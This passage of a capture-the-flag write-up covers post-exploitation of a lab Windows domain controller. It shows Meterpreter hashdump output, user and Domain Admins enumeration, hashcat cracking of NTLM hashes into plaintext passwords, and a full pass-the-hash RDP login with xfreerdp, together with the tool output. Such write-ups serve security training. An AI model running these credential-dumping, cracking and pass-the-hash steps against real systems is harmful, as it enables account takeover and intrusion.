To enumerate the users on this Windows machine, we can issue the hashdump command while still in the Meterpreter shell. It also displays the users' password hashes that we can try to crack.

meterpreter > hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a44b8c433cb56c8d8ad27f7f4df44ab6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bc5cd4292afb61d1ffe517a2637860ad:::
summer.sloan:1112:aad3b435b51404eeaad3b435b51404ee:f3fe9e6330783d307510cc18645b1d0f:::
darcy.roman:1113:aad3b435b51404eeaad3b435b51404ee:d33b15ba0f27dbf0fd56cd54b1db1ade:::
troy.yates:1114:aad3b435b51404eeaad3b435b51404ee:e08847c1090227cb3a9ad59893094b32:::
eve.barr:1115:aad3b435b51404eeaad3b435b51404ee:9a1bece5360ef81d379470d065f95562:::
max.clark:1116:aad3b435b51404eeaad3b435b51404ee:308c4a9a9120c711cfb117ec019e1a9a:::
sally.bird:1117:aad3b435b51404eeaad3b435b51404ee:77a7ad444bf629952a9dc8cc2adcf0e5:::
jessy.rogers:1118:aad3b435b51404eeaad3b435b51404ee:83ccff469a423cb19d391a5fd0b61c28:::
yoder.mullins:1119:aad3b435b51404eeaad3b435b51404ee:4fc7ba2babad8553ef6bf7f9f706b128:::
jace.le:1120:aad3b435b51404eeaad3b435b51404ee:38597e7e9feaeefd8135f9bc981b7499:::
fern.scott:1121:aad3b435b51404eeaad3b435b51404ee:61cedcc6b3f7104ded374fd8fb29b0a4:::
admin.local:1122:aad3b435b51404eeaad3b435b51404ee:699b68000f83d0ce2070a7d3868bee59:::
CAYENNE$:1002:aad3b435b51404eeaad3b435b51404ee:e431643467fea33be6f3f3604dcb21f0:::
ANAHEIM$:1123:aad3b435b51404eeaad3b435b51404ee:96e684520b474d918ca28f96f22e9337:::

Command shell

Alternatively, we can enumerate users by using the command shell. During the CTF, this was the method I used to display usernames on this Windows domain controller.

We can issue the net user command to display a list of usernames available on this host.

C:\Windows\system32>net user
C:\Windows\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
admin.local              Administrator            darcy.roman              
eve.barr                 fern.scott               Guest                    
jace.le                  jessy.rogers             krbtgt                   
max.clark                sally.bird               summer.sloan             
troy.yates               yoder.mullins            
The command completed with one or more errors.

While it accomplishes our task, the better one is the net group "domain admins" command. That is because I wanted to get a domain account with administrator privileges.

C:\Windows\system32>net group "domain admins"
C:\Windows\system32>net group "domain admins"
net group "domain admins"
Group name     Domain Admins
Comment        Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator            fern.scott               jace.le                  
The command completed successfully.

Gaining access

As previously mentioned, I wanted to access the desktop environment, so it is easy for me to look around the computer. I figured I should stick with my first instinct and what I knew to save time.

There are four options that I could think of to get access to the desktop environment with a user account. One option is to crack the password. However, I did not know the hashdump command at the time.

The second option is to create a new account. It is one of the adversaries' tactics they perform to establish persistence. At the time, I was not thinking about this, so I went with the last option.

The third option is to pass the hash method. At the time, I did not know how to do this. In this article, we will explore this option.

The last option is to change the account's password. At the time, I thought it was a good idea since this is not production anyway. In real life, your adversaries will try their best not to get caught, so this is not the option they will use.

Password cracking

Before attempting to crack the passwords, it might be worth discussing Windows passwords a little bit. The earlier versions of Windows used LAN Manager (LANMAN or LM) to generate password hashes. Eventually, Microsoft switched to using NT hash starting Windows 2000, at least according to my limited research.

With the switch to New Technology LAN Manager (NTLM), the format that you would see on hashdump or a similar tool will look like this: username:userid:LMHASH:NTHASH.

Some Windows versions used LM hash when the password's length was under 15 characters. Windows eventually dropped the use of LM hash by default in the later versions.

It is good to know which hashes are of no use to you before cracking passwords. Accounts with hash values that are the same as the example below represent an empty password. It means that the accounts are not allowed for authentication.

Let's take the guest account, for example. This account has an empty LANMAN and NT hash, which means it has no use for us. We can identify this by using a mnemonic. For the LM hash part, use the AAll Day Baffled By. For the NT hash part, use the Difficult Choices For Encrypted Data. I am sure there are different mnemonic, but I use this.

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

We can safely ignore accounts with empty LM and NT hashes. Additionally, if the LM hashes match our mnemonic, we do not have to crack them. Since our example above has empty LM hashes, we will concentrate on the NT hashes.

I took the hashdump output and put all its contents on a file.

andrew@kali:~$ cat hashes
andrew@kali:~$ cat hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a44b8c433cb56c8d8ad27f7f4df44ab6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bc5cd4292afb61d1ffe517a2637860ad:::
summer.sloan:1112:aad3b435b51404eeaad3b435b51404ee:f3fe9e6330783d307510cc18645b1d0f:::
darcy.roman:1113:aad3b435b51404eeaad3b435b51404ee:d33b15ba0f27dbf0fd56cd54b1db1ade:::
troy.yates:1114:aad3b435b51404eeaad3b435b51404ee:e08847c1090227cb3a9ad59893094b32:::
eve.barr:1115:aad3b435b51404eeaad3b435b51404ee:9a1bece5360ef81d379470d065f95562:::
max.clark:1116:aad3b435b51404eeaad3b435b51404ee:308c4a9a9120c711cfb117ec019e1a9a:::
sally.bird:1117:aad3b435b51404eeaad3b435b51404ee:77a7ad444bf629952a9dc8cc2adcf0e5:::
jessy.rogers:1118:aad3b435b51404eeaad3b435b51404ee:83ccff469a423cb19d391a5fd0b61c28:::
yoder.mullins:1119:aad3b435b51404eeaad3b435b51404ee:4fc7ba2babad8553ef6bf7f9f706b128:::
jace.le:1120:aad3b435b51404eeaad3b435b51404ee:38597e7e9feaeefd8135f9bc981b7499:::
fern.scott:1121:aad3b435b51404eeaad3b435b51404ee:61cedcc6b3f7104ded374fd8fb29b0a4:::
admin.local:1122:aad3b435b51404eeaad3b435b51404ee:699b68000f83d0ce2070a7d3868bee59:::
CAYENNE$:1002:aad3b435b51404eeaad3b435b51404ee:e431643467fea33be6f3f3604dcb21f0:::
ANAHEIM$:1123:aad3b435b51404eeaad3b435b51404ee:96e684520b474d918ca28f96f22e9337:::

Then, I used the cut command utility to remove fields that I did not want in another file.

andrew@kali:~$ cat hashes | cut -d ':' -f 1,4
andrew@kali:~$ cat hashes | cut -d ':' -f 1,4
Administrator:a44b8c433cb56c8d8ad27f7f4df44ab6
Guest:31d6cfe0d16ae931b73c59d7e0c089c0
krbtgt:bc5cd4292afb61d1ffe517a2637860ad
summer.sloan:f3fe9e6330783d307510cc18645b1d0f
darcy.roman:d33b15ba0f27dbf0fd56cd54b1db1ade
troy.yates:e08847c1090227cb3a9ad59893094b32
eve.barr:9a1bece5360ef81d379470d065f95562
max.clark:308c4a9a9120c711cfb117ec019e1a9a
sally.bird:77a7ad444bf629952a9dc8cc2adcf0e5
jessy.rogers:83ccff469a423cb19d391a5fd0b61c28
yoder.mullins:4fc7ba2babad8553ef6bf7f9f706b128
jace.le:38597e7e9feaeefd8135f9bc981b7499
fern.scott:61cedcc6b3f7104ded374fd8fb29b0a4
admin.local:699b68000f83d0ce2070a7d3868bee59
CAYENNE$:e431643467fea33be6f3f3604dcb21f0
ANAHEIM$:96e684520b474d918ca28f96f22e9337

Additionally, I took out the accounts that I did not want to crack.

andrew@kali:~$ cat hash
andrew@kali:~$ cat hash
Administrator:a44b8c433cb56c8d8ad27f7f4df44ab6
summer.sloan:f3fe9e6330783d307510cc18645b1d0f
darcy.roman:d33b15ba0f27dbf0fd56cd54b1db1ade
troy.yates:e08847c1090227cb3a9ad59893094b32
eve.barr:9a1bece5360ef81d379470d065f95562
max.clark:308c4a9a9120c711cfb117ec019e1a9a
sally.bird:77a7ad444bf629952a9dc8cc2adcf0e5
jessy.rogers:83ccff469a423cb19d391a5fd0b61c28
yoder.mullins:4fc7ba2babad8553ef6bf7f9f706b128
jace.le:38597e7e9feaeefd8135f9bc981b7499
fern.scott:61cedcc6b3f7104ded374fd8fb29b0a4
admin.local:699b68000f83d0ce2070a7d3868bee59

Let's get cracking

We are now ready to use hashcat to crack the hashes. Since we are cracking NT hash, we will use hash mode 1000, NTLM in hashcat's terminology. For the attack mode, we will use the brute force method. Additionally, since we also included the username in the hash file, we need to tell hashcat to exclude it when cracking.

andrew@kali:~$ hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt --username --separator ":"
andrew@kali:~$ hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt --username --separator ":"
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-10710U CPU @ 1.10GHz, 1422/1486 MB (512 MB allocatable), 1MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 12 digests; 12 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 64 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
f3fe9e6330783d307510cc18645b1d0f:butterfly       
e08847c1090227cb3a9ad59893094b32:tinkerbell      
d33b15ba0f27dbf0fd56cd54b1db1ade:spongebob       
9a1bece5360ef81d379470d065f95562:dolphins        
308c4a9a9120c711cfb117ec019e1a9a:asdfghjkl       
83ccff469a423cb19d391a5fd0b61c28:ladybug         
77a7ad444bf629952a9dc8cc2adcf0e5:popcorn         
4fc7ba2babad8553ef6bf7f9f706b128:margarita       
38597e7e9feaeefd8135f9bc981b7499:nikita          
Approaching final keyspace - workload adjusted.  
                                                 
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: NTLM
Hash.Target......: hash
Time.Started.....: Wed Dec 16 19:46:53 2021 (4 secs)
Time.Estimated...: Wed Dec 16 19:46:57 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4568.0 kH/s (0.12ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 9/12 (75.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Started: Wed Dec 16 19:46:53 2021
Stopped: Wed Dec 16 19:46:58 2021

As you can see from the output above, it is hard to tell which accounts we have access to now. We can issue another command to line up the cracked passwords with the username.

andrew@kali:~$ hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt --username --separator ":" --show
andrew@kali:~$ hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt --username --separator ":" --show
summer.sloan:f3fe9e6330783d307510cc18645b1d0f:butterfly
darcy.roman:d33b15ba0f27dbf0fd56cd54b1db1ade:spongebob
troy.yates:e08847c1090227cb3a9ad59893094b32:tinkerbell
eve.barr:9a1bece5360ef81d379470d065f95562:dolphins
max.clark:308c4a9a9120c711cfb117ec019e1a9a:asdfghjkl
sally.bird:77a7ad444bf629952a9dc8cc2adcf0e5:popcorn
jessy.rogers:83ccff469a423cb19d391a5fd0b61c28:ladybug
yoder.mullins:4fc7ba2babad8553ef6bf7f9f706b128:margarita
jace.le:38597e7e9feaeefd8135f9bc981b7499:nikita

It looks like jace.le is using a weak password, and since this account has administrator-level access, we can use it to connect via RDP.

Pass the hash

If we opt for the pass the hash approach to access the desktop via RDP, we need to gather some information. We need the username, NT hash, domain name, and target's IP address for us to connect.

Our Nmap results already revealed the domain name, so we are good to go. If we ran a different Nmap command option, we would not have the domain name. In that case, we can use the command shell to gather this information.

C:\Windows\system32>systeminfo | findstr /B Domain
systeminfo | findstr /B Domain
Domain:                    scoville.local

RDP access via pass the hash

Since we have the necessary information, we are ready to access the desktop via RDP. There are two RDP software clients available in Kali Linux: xfreerdp and rdesktop. As far as I know, rdesktop does not allow the pass-the-hash option, but xfreerdp does. That said, we are going to use it for this task.

The command, as shown below, is self-explanatory, so we are not going to discuss what each command option does.

andrew@kali:~$ xfreerdp /u:Administrator /d:scoville.local /pth:a44b8c433cb56c8d8ad27f7f4df44ab6 /v:172.20.20.37
andrew@kali:~$ xfreerdp /u:Administrator /d:scoville.local /pth:a44b8c433cb56c8d8ad27f7f4df44ab6 /v:172.20.20.37
[19:05:52:302] [820544:820545] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[19:05:52:302] [820544:820545] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[19:05:52:302] [820544:820545] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[19:05:52:302] [820544:820545] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[19:05:52:612] [820544:820545] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized
[19:05:52:622] [820544:820545] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state
[19:05:52:628] [820544:820545] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state
[19:05:52:659] [820544:820545] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[19:05:52:659] [820544:820545] [WARN][com.freerdp.crypto] - CN = cayenne.scoville.local
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - VERSION ={
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductMajorVersion: 6
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductMinorVersion: 1
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductBuild: 7601
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	Reserved: 0x000000
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMRevisionCurrent: 0x0F
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - negotiateFlags "0xE2898235"
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_56 (0),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_KEY_EXCH (1),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_128 (2),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_VERSION (6),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_TARGET_INFO (8),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_EXTENDED_SESSION_SECURITY (12),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_TARGET_TYPE_DOMAIN (15),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_ALWAYS_SIGN (16),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_NTLM (22),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_SEAL (26),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_SIGN (27),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_REQUEST_TARGET (29),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_UNICODE (31),
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - VERSION ={
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductMajorVersion: 6
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductMinorVersion: 3
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductBuild: 9600
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	Reserved: 0x000000
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMRevisionCurrent: 0x0F
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - AV_PAIRs =
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvNbDomainName AvId: 2 AvLen: 1980911088
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 53 00 43 00 4f 00 56 00 49 00 4c 00 4c 00 45 00 S.C.O.V.I.L.L.E.
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=16] 
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvNbComputerName AvId: 1 AvLen: 1980911088
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 43 00 41 00 59 00 45 00 4e 00 4e 00 45 00       C.A.Y.E.N.N.E.
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=14] 
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvDnsDomainName AvId: 4 AvLen: 1980911088
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e.
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 2e 00 6c 00 6f 00 63 00 61 00 6c 00             ..l.o.c.a.l.
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=28] 
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvDnsComputerName AvId: 3 AvLen: 1980911088
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 63 00 61 00 79 00 65 00 6e 00 6e 00 65 00 2e 00 c.a.y.e.n.n.e...
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e.
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0032 2e 00 6c 00 6f 00 63 00 61 00 6c 00             ..l.o.c.a.l.
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=44] 
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvDnsTreeName AvId: 5 AvLen: 1980911088
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e.
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 2e 00 6c 00 6f 00 63 00 61 00 6c 00             ..l.o.c.a.l.
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=28] 
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvTimestamp AvId: 7 AvLen: 1980911088
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 0e 61 c2 4d 65 f2 d7 01                         .a.Me...
[19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=8] 
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - negotiateFlags "0xE288B235"
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_56 (0),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_KEY_EXCH (1),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_128 (2),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_VERSION (6),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_TARGET_INFO (8),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_EXTENDED_SESSION_SECURITY (12),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_ALWAYS_SIGN (16),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED (18),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_DOMAIN_SUPPLIED (19),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_NTLM (22),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_SEAL (26),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_SIGN (27),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_REQUEST_TARGET (29),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMSSP_NEGOTIATE_UNICODE (31),
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - VERSION ={
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductMajorVersion: 6
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductMinorVersion: 1
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductBuild: 7601
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	Reserved: 0x000000
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMRevisionCurrent: 0x0F
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - AV_PAIRs =
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvNbDomainName AvId: 2 AvLen: 1980911088
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 53 00 43 00 4f 00 56 00 49 00 4c 00 4c 00 45 00 S.C.O.V.I.L.L.E.
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=16] 
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvNbComputerName AvId: 1 AvLen: 1980911088
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 43 00 41 00 59 00 45 00 4e 00 4e 00 45 00       C.A.Y.E.N.N.E.
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=14] 
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvDnsDomainName AvId: 4 AvLen: 1980911088
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e.
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 2e 00 6c 00 6f 00 63 00 61 00 6c 00             ..l.o.c.a.l.
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=28] 
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvDnsComputerName AvId: 3 AvLen: 1980911088
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 63 00 61 00 79 00 65 00 6e 00 6e 00 65 00 2e 00 c.a.y.e.n.n.e...
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e.
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0032 2e 00 6c 00 6f 00 63 00 61 00 6c 00             ..l.o.c.a.l.
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=44] 
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvDnsTreeName AvId: 5 AvLen: 1980911088
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e.
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 2e 00 6c 00 6f 00 63 00 61 00 6c 00             ..l.o.c.a.l.
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=28] 
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvTimestamp AvId: 7 AvLen: 1980911088
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 0e 61 c2 4d 65 f2 d7 01                         .a.Me...
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=8] 
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvFlags AvId: 6 AvLen: 1980911088
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 02 00 00 00                                     ....
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=4] 
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvChannelBindings AvId: 10 AvLen: 1980911088
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=16] 
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	MsvAvTargetName AvId: 9 AvLen: 1980911088
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 54 00 45 00 52 00 4d 00 53 00 52 00 56 00 2f 00 T.E.R.M.S.R.V./.
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 31 00 37 00 32 00 2e 00 32 00 30 00 2e 00 32 00 1.7.2...2.0...2.
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0032 30 00 2e 00 33 00 37 00                         0...3.7.
[19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=40] 
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - ShareCapabilitySet (length 4):
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	nodeId: 0x03EA
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2Octets: 0x0000
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - GeneralCapabilitySet (length 20):
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	osMajorType: 0x0001
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	osMinorType: 0x0003
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	protocolVersion: 0x0200
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsA: 0x0000
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	generalCompressionTypes: 0x0000
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	extraFlags: 0x041D
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	updateCapabilityFlag: 0x0000
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	remoteUnshareFlag: 0x0000
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	generalCompressionLevel: 0x0000
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	refreshRectSupport: 0x01
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	suppressOutputSupport: 0x01
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - VirtualChannelCapabilitySet (length 8):
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	flags: 0x00000002
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	VCChunkSize: 0x00000640
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - FontCapabilitySet (length 4):
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	fontSupportFlags: 0x0001
